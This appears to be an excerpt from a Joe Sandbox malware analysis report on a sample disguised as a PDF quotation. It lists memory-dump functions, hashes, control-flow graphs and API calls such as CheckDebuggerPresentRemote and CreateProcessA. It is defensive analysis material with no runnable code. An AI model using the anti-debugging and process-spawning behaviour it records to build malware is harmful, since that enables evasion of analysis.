                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: ae02c7acbb4dc03ef897388ae949ab28d82459c63bf4b9b2b875facc57fb4110
                            • Instruction ID: 6ffad671fc84373bd62f52483d091a856248cffb3507cfa8b64f4b9285f440b2
                            • Opcode Fuzzy Hash: ae02c7acbb4dc03ef897388ae949ab28d82459c63bf4b9b2b875facc57fb4110
                            • Instruction Fuzzy Hash: 03215C72900349CFDB14CFAAC444BEEBBF5AF48320F14842AD455A7240C7389A44DFA0
                            Function 01374998 Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: L+8^
                            • API String ID: 0-1607618960
                            • Opcode ID: 20f2da8b2228d0d3b17d6937c85415038821b7d9355c46c515598e7c841caca6
                            • Instruction ID: 3bd4a8adfcb1e1b3d87af4b1577dd220fb7db122518f2de43aa5326e24c38fec
                            • Opcode Fuzzy Hash: 20f2da8b2228d0d3b17d6937c85415038821b7d9355c46c515598e7c841caca6
                            • Instruction Fuzzy Hash: 52C16A30A0420ACFD721CF59D5847AAB7F2FB81318F14C6BAC4559BA59E338BA85CF51
                            Function 02DBB4F0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: \V!m
                            • API String ID: 0-1999779074
                            • Opcode ID: b716bfff0e400df99eb5bfa5cc377ece421a5d26f8e132e8e41d70207c92e3ee
                            • Instruction ID: 28f8359d0de92c586c743e57963d16af3304f4668ba86d4172d901c11789986d
                            • Opcode Fuzzy Hash: b716bfff0e400df99eb5bfa5cc377ece421a5d26f8e132e8e41d70207c92e3ee
                            • Instruction Fuzzy Hash: 2DB13D70E00249CFDB15CFA9C8957EEBBF2AF88718F14812AD816A7354EB749C45CB91
                            Function 02DB3C93 Relevance: .8, Instructions: 804COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3a280a2229160b5077bbae119eff5ed50477328f9ffb9d50fc8d356e4fbc2be
                            • Instruction ID: 338ed5288143a9d7270861e50c8c58436634a890fab24963b26554f5e33bcd6d
                            • Opcode Fuzzy Hash: b3a280a2229160b5077bbae119eff5ed50477328f9ffb9d50fc8d356e4fbc2be
                            • Instruction Fuzzy Hash: 16829C74945268CFDBA5CF28D8A8BE9B7B1BB49304F5051EAD40AA7351DB789EC4CF00
                            Function 02DB457B Relevance: .8, Instructions: 789COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6867cea44f1c6a60faa14a6bac0e611b2531634a32b6db56a99941b19f47080d
                            • Instruction ID: 5b0b62ad3645d57e615558b7a11e11b30fb5e8760e100a0ec26233387689d0b7
                            • Opcode Fuzzy Hash: 6867cea44f1c6a60faa14a6bac0e611b2531634a32b6db56a99941b19f47080d
                            • Instruction Fuzzy Hash: 53829E74945268CFDBA5CF28D8A8BE9B7B1BB49304F5051EAD40AA7351DB789EC4CF00
                            Function 02DB40CE Relevance: .8, Instructions: 769COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d5c569f8fd0288040b7cab7dd7c616cd303dff695df0c71a805bace1aff445a1
                            • Instruction ID: bef9b19d64e947a027dd484456f7566e7aeeb8c6cf00a295a29ef5e81864e132
                            • Opcode Fuzzy Hash: d5c569f8fd0288040b7cab7dd7c616cd303dff695df0c71a805bace1aff445a1
                            • Instruction Fuzzy Hash: 61829D74945268CFDBA5CF28D8A8BE9B7B1BB49304F5051EAD40AA7351DB789EC4CF00
                            Function 02DB4134 Relevance: .6, Instructions: 572COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f0027aaea9df062e437b6613c4d0859575f6b9d9f28b1fc1b345640b833e91f0
                            • Instruction ID: 53ddea222bae3c2ca36c65b9f98034b379d11d258f86762228fddce924335a5f
                            • Opcode Fuzzy Hash: f0027aaea9df062e437b6613c4d0859575f6b9d9f28b1fc1b345640b833e91f0
                            • Instruction Fuzzy Hash: 80529D74A45668CFDB65CF28D8A8BE9B7B1BB49304F1051EAD40AA7351DB789EC0CF40
                            Function 02DB486E Relevance: .4, Instructions: 380COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 438c79b33f09413837414ce5302c04569814ad167c4062d9de9889d9fceacc13
                            • Instruction ID: 32a3dcb633f9f19032d3b23f42c43573addba9a15e061e30b7207994f8c799b7
                            • Opcode Fuzzy Hash: 438c79b33f09413837414ce5302c04569814ad167c4062d9de9889d9fceacc13
                            • Instruction Fuzzy Hash: 03128BB4905268CFDB66CF28D8A8BE9B7B1BB49305F1051E9D40AA7352D7789EC4CF04
                            Function 02DB466D Relevance: .4, Instructions: 362COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f6ce06f72ffe6733718447db9fe0a624b37f9412e0e138736779e67060ad8b6a
                            • Instruction ID: 6f9cc186e808b27c1a302db78420ab2103f5d71e5322834c36f8c63f305055a8
                            • Opcode Fuzzy Hash: f6ce06f72ffe6733718447db9fe0a624b37f9412e0e138736779e67060ad8b6a
                            • Instruction Fuzzy Hash: 50028BB4905268CFDB65CF28D8A8BE9B7B5BB49305F1091E9D40AA7352D7789EC4CF00
                            Function 02DD4A30 Relevance: .3, Instructions: 296COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 34c940a12f966d9d832ba2158dbc4912109cb2f783df3a038ff9872c3047fb36
                            • Instruction ID: 50201970a611520b061ee2547b16822e1e342293b0afbddfbcc39a2b1dbd3dcc
                            • Opcode Fuzzy Hash: 34c940a12f966d9d832ba2158dbc4912109cb2f783df3a038ff9872c3047fb36
                            • Instruction Fuzzy Hash: F9D1E0B4905618CFDB64CFA8D844BEDBBB2FB49304F10916AD809AB390D738AD85DF54
                            Function 02DD4A40 Relevance: .3, Instructions: 288COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5ff6b38b7fdb62cca6f137f7bc72fc82aa79e3246cc5563af973f1fa5d8cd066
                            • Instruction ID: ec18ad68b6d8fdd1dcf61e449ededa8033c57e4e2bc2e3cd0efc50fb755419db
                            • Opcode Fuzzy Hash: 5ff6b38b7fdb62cca6f137f7bc72fc82aa79e3246cc5563af973f1fa5d8cd066
                            • Instruction Fuzzy Hash: C7D1EEB4905618CFDB64CFA8D844BEDBBB2FB48304F10916AD809A7390DB78AD85DF54
                            Function 08A5D868 Relevance: .3, Instructions: 276COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7d64bdcc78fdf6f17c3fe5cdb2a73a162d8de0ad0620c5ca4d57d3b1f718c79a
                            • Instruction ID: eb9f9df7e9bfeb41d0771c7b8b4698fd8675b4608a337d6af42fecaeddb0e9a2
                            • Opcode Fuzzy Hash: 7d64bdcc78fdf6f17c3fe5cdb2a73a162d8de0ad0620c5ca4d57d3b1f718c79a
                            • Instruction Fuzzy Hash: 89D1AE74A01218CFDB54DFA9D994B9DBBB2FF89300F1081A9D909AB365DB34AD81CF50
                            Function 02DB3470 Relevance: .3, Instructions: 267COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b993aec335281ff7f5804eb43983faf882e198b9dc33ebf8e8a43d8d1c8f67b
                            • Instruction ID: 005ede2a0925dd9fb86d5430ddd1f95751ae6ec98ff1d43f5be1f6daf63a292e
                            • Opcode Fuzzy Hash: 0b993aec335281ff7f5804eb43983faf882e198b9dc33ebf8e8a43d8d1c8f67b
                            • Instruction Fuzzy Hash: D991456190E3D19FD7079B3888742C4BFB19F8B214F0A40D7C0C59F2A3DA285C9AD76A
                            Function 02DBBDC0 Relevance: .3, Instructions: 266COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d42d12cbcaf3ed7fc0a0e77045fdb3052d70d999126834bb44dee5339064c940
                            • Instruction ID: 09ced9fd47e4e9f3cd7bb383bcaa949bfd76f86ddfcca609ad0819ab15b536b5
                            • Opcode Fuzzy Hash: d42d12cbcaf3ed7fc0a0e77045fdb3052d70d999126834bb44dee5339064c940
                            • Instruction Fuzzy Hash: 8AB13D70E10209CFDB11CFA9D8957EDBBF2AF88718F14812AD816A7394EB759845CF81
                            Function 02DD3FB8 Relevance: .3, Instructions: 261COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c169857f53a3902d8e575e07db26d741bfbbadf3b0e4bf855547cafcdd2288d
                            • Instruction ID: 560bde4c2ba35c3c699ccb1b6e4edccd513dc2b728cfdb5f42ab370862dfdf81
                            • Opcode Fuzzy Hash: 1c169857f53a3902d8e575e07db26d741bfbbadf3b0e4bf855547cafcdd2288d
                            • Instruction Fuzzy Hash: C2C1D074E01618CFDB64CFA9D884BADBBB2FB89304F6091A9D459A7354DB386D85CF00
                            Function 02DD3FC8 Relevance: .3, Instructions: 260COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 015726e023da925ca8f7ebc1d04d1900eeece3078f8b7e9e1d3485b69d01eca1
                            • Instruction ID: 75479be4b593435078bdf8c65bf1137a3d5c7f54023e8923162843f6f0ba313b
                            • Opcode Fuzzy Hash: 015726e023da925ca8f7ebc1d04d1900eeece3078f8b7e9e1d3485b69d01eca1
                            • Instruction Fuzzy Hash: 80B1C174E05618CFDB24CFA9D884BADBBB2FB89304F6091A9D419A7354DB386D85CF40
                            Function 02DB22A6 Relevance: .2, Instructions: 246COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d7f2cc5601ba1fba23f3a0a0ee0676707683f38d0ef1938f35bb6c905205d8f
                            • Instruction ID: 486b40cb33bac8320b9f617ab1db40ba1c11a5e9d4460a749123bdd6ce05f5b8
                            • Opcode Fuzzy Hash: 3d7f2cc5601ba1fba23f3a0a0ee0676707683f38d0ef1938f35bb6c905205d8f
                            • Instruction Fuzzy Hash: 38A13671D05208CFDB15CFAAD468BECBBF5AF49304F04902AD89AA7360D7798A85CF01
                            Function 02DB2E70 Relevance: .2, Instructions: 153COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc6500bdb7dc091b388877d6d433399a071592dad55d6f5d87b0b23753fdfdcc
                            • Instruction ID: ad5115e11ef6fd1d9e6be87869dc1f07625cf205fa93806d81c365ebe0b30c6b
                            • Opcode Fuzzy Hash: fc6500bdb7dc091b388877d6d433399a071592dad55d6f5d87b0b23753fdfdcc
                            • Instruction Fuzzy Hash: 4F51D075D05208DBDB56CFAAD4587EDBBB6FF4A304F149029D80AA7380D7789D86CB10
                            Function 02DB2E80 Relevance: .1, Instructions: 147COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f56e3f792365a29db5f0dad0bb7cb6c64fa49b4362bee61c777f8cdcc6746221
                            • Instruction ID: 8cff60dc294c6741faecd9fa0167536aec801d833b1efe1ccf47161e9be8f413
                            • Opcode Fuzzy Hash: f56e3f792365a29db5f0dad0bb7cb6c64fa49b4362bee61c777f8cdcc6746221
                            • Instruction Fuzzy Hash: C751D075D05208CBDB56CFAAD458BEDBBB6FF4A304F109029D80AA7394D778AD85CB10
                            Function 08A5D020 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1941165349.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_8a40000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ea1cd20ca7320062af17f14191498395bfebefa2bafac7bbb6010ed6b922421
                            • Instruction ID: e2f56da2f21bad3122a5d5490cec94f9b4fb54fe4fb805180b1f529323d76336
                            • Opcode Fuzzy Hash: 1ea1cd20ca7320062af17f14191498395bfebefa2bafac7bbb6010ed6b922421
                            • Instruction Fuzzy Hash: 9651C374A01218DFEB54CF28D855BA9BBF1FB49705F0081B9E80AA7791DB39AD85CF01
                            Function 02DD5CC0 Relevance: 3.8, Strings: 3, Instructions: 46COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 2dd5cc0-2dd5cc7 1 2dd5ccd-2dd5cef 0->1 2 2dd5388-2dd53c9 0->2 3 2dd5cf5-2dd5d00 1->3 4 2dd51d2-2dd51db 1->4 16 2dd53cc call 2db7879 2->16 17 2dd53cc call 2db7880 2->17 3->4 6 2dd51dd-2dd523e 4->6 7 2dd51e4-2dd6148 4->7 6->4 12 2dd5240-2dd524b 6->12 7->4 12->4 14 2dd53ce-2dd5409 14->4 15 2dd540f-2dd541a 14->15 15->4 16->14 17->14
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: %$,$/
                            • API String ID: 0-2336033915
                            • Opcode ID: e7253efb93df14b7275be60061abf1c83f7d69eb332bcdcccbbd7c8880a6d276
                            • Instruction ID: 5acf8b82a0cd27407f497b4a29c5c2d0159fe5c4925e2fa15ad65ccff1a325a6
                            • Opcode Fuzzy Hash: e7253efb93df14b7275be60061abf1c83f7d69eb332bcdcccbbd7c8880a6d276
                            • Instruction Fuzzy Hash: E621AF74900668CFDB65CF54E948BECBBB2BB48305F5484EAD509AB250CB795ED5CF00
                            Function 02DD57EB Relevance: 2.5, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 18 2dd57eb-2dd57ef 19 2dd59e5-2dd59fb 18->19 20 2dd57f5-2dd5817 18->20 31 2dd59fe call 2db7198 19->31 32 2dd59fe call 2db71a0 19->32 21 2dd581d-2dd5828 20->21 22 2dd51d2-2dd51db 20->22 21->22 24 2dd51dd-2dd523e 22->24 25 2dd51e4-2dd6148 22->25 23 2dd5a00-2dd5a38 23->22 26 2dd5a3e-2dd5a49 23->26 24->22 30 2dd5240-2dd524b 24->30 25->22 26->22 30->22 31->23 32->23
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: >$C
                            • API String ID: 0-3481919492
                            • Opcode ID: 53dd0276c1e9ac304d66f9e946879f966ee629cefb302195ec13f18c832f9910
                            • Instruction ID: 5fa7a009eef19bea70e5f661dafa2f86c62fe4f839942ab9dc2eb003a73ede6a
                            • Opcode Fuzzy Hash: 53dd0276c1e9ac304d66f9e946879f966ee629cefb302195ec13f18c832f9910
                            • Instruction Fuzzy Hash: 0D119D74956668CFEB20CF14D948BE8B7B2FB09314F9485EAC419A7381C3799E96CF00
                            Function 02DD5CA6 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 33 2dd5ca6-2dd5caa 34 2dd549d-2dd54d6 33->34 35 2dd5cb0-2dd5cba 33->35 48 2dd54d9 call 2dd7749 34->48 49 2dd54d9 call 2dd7758 34->49 39 2dd54df-2dd550d 40 2dd5513-2dd551e 39->40 41 2dd51d2-2dd51db 39->41 40->41 42 2dd51dd-2dd523e 41->42 43 2dd51e4-2dd6148 41->43 42->41 47 2dd5240-2dd524b 42->47 43->41 47->41 48->39 49->39
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: &$)
                            • API String ID: 0-1893440138
                            • Opcode ID: 789dbc98d5180fa3afc990d76198e3cce2f9f8b224a150db6445510f31958a53
                            • Instruction ID: f8e6339fd0d322a992049989ece5bbb32cac1a2b9167764c9bfc7c07d011b26f
                            • Opcode Fuzzy Hash: 789dbc98d5180fa3afc990d76198e3cce2f9f8b224a150db6445510f31958a53
                            • Instruction Fuzzy Hash: DA01D370900268CFDB64CF58E994BEDBBB1BB05304F50549AD609B6280CB7A6ED0CF40
                            Function 02DD545C Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 50 2dd545c-2dd5463 51 2dd5469-2dd5489 50->51 52 2dd5c4b-2dd5c52 50->52 53 2dd548f-2dd5498 51->53 54 2dd51d2-2dd51db 51->54 57 2dd5c5c-2dd5c90 52->57 53->54 55 2dd51dd-2dd523e 54->55 56 2dd51e4-2dd6148 54->56 55->54 62 2dd5240-2dd524b 55->62 56->54 57->54 58 2dd5c96-2dd5ca1 57->58 58->54 62->54
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$*
                            • API String ID: 0-4007355372
                            • Opcode ID: 87a2896159d2db7a7e4be99dc2273158dc04e3e8cb89ee377f6af5c78276c8b7
                            • Instruction ID: 424e995d1e44d5a24f401b7f0a9cf14d68fae2902f498608f967fcf0602a231b
                            • Opcode Fuzzy Hash: 87a2896159d2db7a7e4be99dc2273158dc04e3e8cb89ee377f6af5c78276c8b7
                            • Instruction Fuzzy Hash: AB018C70911669CFDB60CF58E948BE9B7F2AB49314F9094E68419A3200D7746EC4CF04
                            Function 02DD5F6D Relevance: 2.5, Strings: 2, Instructions: 31COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 63 2dd5f6d-2dd5f74 64 2dd582d-2dd5843 63->64 65 2dd5f7a-2dd5f9c 63->65 76 2dd5846 call 2db7198 64->76 77 2dd5846 call 2db71a0 64->77 67 2dd51d2-2dd51db 65->67 68 2dd5fa2-2dd5fad 65->68 69 2dd51dd-2dd523e 67->69 70 2dd51e4-2dd6148 67->70 68->67 69->67 75 2dd5240-2dd524b 69->75 70->67 71 2dd5848-2dd5862 75->67 76->71 77->71
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$H
                            • API String ID: 0-1447585844
                            • Opcode ID: caa28b863a6439bcef214b0c8d949cc916d1906ed736b0d29fa0dcd47853d525
                            • Instruction ID: d449c89c08fa218bb6ce3bee27f61e513a445a112d304200879f3caff6b4328b
                            • Opcode Fuzzy Hash: caa28b863a6439bcef214b0c8d949cc916d1906ed736b0d29fa0dcd47853d525
                            • Instruction Fuzzy Hash: 9001CC74805228CFDBA0CF14E988BE8BBF2AB08314F6484EAD519A7240C7799ED5CF00
                            Function 02DD58A7 Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 2dd58a7-2dd58ae 79 2dd58b4-2dd58be 78->79 80 2dd5523-2dd5550 78->80 85 2dd5556 call 2dd7841 80->85 86 2dd5556 call 2dd7850 80->86 84 2dd555c-2dd556c 85->84 86->84
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;$A
                            • API String ID: 0-659309507
                            • Opcode ID: 108d049fe12c15a0de12952fa178ba611ec7af7dc42727961487358b0539f0f3
                            • Instruction ID: 56d9eae0c944d67342fccf858516d190212f45b5133459bb167afd7a4224545c
                            • Opcode Fuzzy Hash: 108d049fe12c15a0de12952fa178ba611ec7af7dc42727961487358b0539f0f3
                            • Instruction Fuzzy Hash: DEF0B274904218DFDB64DF20E854BECBBB1AB45300F9094A98489A7340DB745EC4CF11
                            Function 02DB6E9D Relevance: 1.7, APIs: 1, Instructions: 205processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 668 2db6e9d-2db6f18 670 2db6f1a-2db6f24 668->670 671 2db6f51-2db6f71 668->671 670->671 672 2db6f26-2db6f28 670->672 678 2db6faa-2db6fe4 671->678 679 2db6f73-2db6f7d 671->679 673 2db6f4b-2db6f4e 672->673 674 2db6f2a-2db6f34 672->674 673->671 676 2db6f38-2db6f47 674->676 677 2db6f36 674->677 676->676 680 2db6f49 676->680 677->676 685 2db701d-2db7092 CreateProcessA 678->685 686 2db6fe6-2db6ff0 678->686 679->678 681 2db6f7f-2db6f81 679->681 680->673 683 2db6f83-2db6f8d 681->683 684 2db6fa4-2db6fa7 681->684 687 2db6f8f 683->687 688 2db6f91-2db6fa0 683->688 684->678 698 2db709b-2db70e3 685->698 699 2db7094-2db709a 685->699 686->685 690 2db6ff2-2db6ff4 686->690 687->688 688->688 689 2db6fa2 688->689 689->684 691 2db7017-2db701a 690->691 692 2db6ff6-2db7000 690->692 691->685 694 2db7002 692->694 695 2db7004-2db7013 692->695 694->695 695->695 697 2db7015 695->697 697->691 704 2db70f3-2db70f7 698->704 705 2db70e5-2db70e9 698->705 699->698 707 2db70f9-2db70fd 704->707 708 2db7107-2db710b 704->708 705->704 706 2db70eb 705->706 706->704 707->708 709 2db70ff 707->709 710 2db711b 708->710 711 2db710d-2db7111 708->711 709->708 713 2db711c 710->713 711->710 712 2db7113 711->712 712->710 713->713
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02DB7082
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 7d88193e03c5b48ca4dcc1d5c44ec04203fa486cc9711f105811af7b4d2a6d09
                            • Instruction ID: b6de0424638c1142e60db673b96e88b8fe6c4fbec5862bacd47188d8c567b59f
                            • Opcode Fuzzy Hash: 7d88193e03c5b48ca4dcc1d5c44ec04203fa486cc9711f105811af7b4d2a6d09
                            • Instruction Fuzzy Hash: 2C813671D00649DFEB11CFA9C8957EEBBF1AF48314F24812AE856A7384DB749881CF91
                            Function 02DB6EA8 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                            Download Yara Rule

